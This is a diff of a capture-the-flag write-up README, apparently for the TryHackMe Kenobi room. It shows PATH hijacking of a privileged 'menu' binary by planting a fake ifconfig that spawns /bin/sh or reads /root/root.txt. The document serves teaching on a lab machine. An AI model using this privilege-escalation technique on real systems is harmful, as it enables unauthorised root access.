zinzloun/THM_WriteUP/PT_Path_notes/README.md

        Invalid choice
       ;*3$"

-The binary call 3 commands: curl, kernel, ifconfig, without specifing the full path.
-This allows us to create a malicious version of once of the executed command, e.g.
+The menu calls 3 commands: curl, kernel, ifconfig, without specifing the full path.
+This allows us to create a malicious version of once of the executed commands, e.g. ifconfig.

-    echo "/bin/sh" > ifconfig
-    chmod ugo+x ifconfig
-Executing the command we get a shell

-      kenobi@kenobi:~$ ./ifconfig
-      $

-Inspecting the PATH enviroment variable>
+Inspecting the PATH enviroment variable:

     echo $PATH
       /home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
-We can see that the user bin directory is in the PATH, we can just move to this directory our ifconfig:
+We can see that current user bin directory is in the PATH, so we can just create our malicious version of ifconfig inside the user's home bin directory:

-    $ pwd
+     pwd
       /home/kenobi
-    $ mkdir bin
+    mkdir bin
+    cd bin
+    echo "cat /root/root.txt" > ifconfig
+    chmod ugo+x ifconfig
+Executing the command we get an access error since we don't have the permission to read the flag:

-    $ mv ifconfig bin/
+      ifconfig
-    $ /home/kenobi/bin/ifconfig
-    $ whoami
-    kenobi

-Now exit from the current session and try the exploit:
+      cat: /root/root.txt: Permission denied

+But if we call it using the menu command interface we get the flag:

     kenobi@kenobi:~$ menu
     ***************************************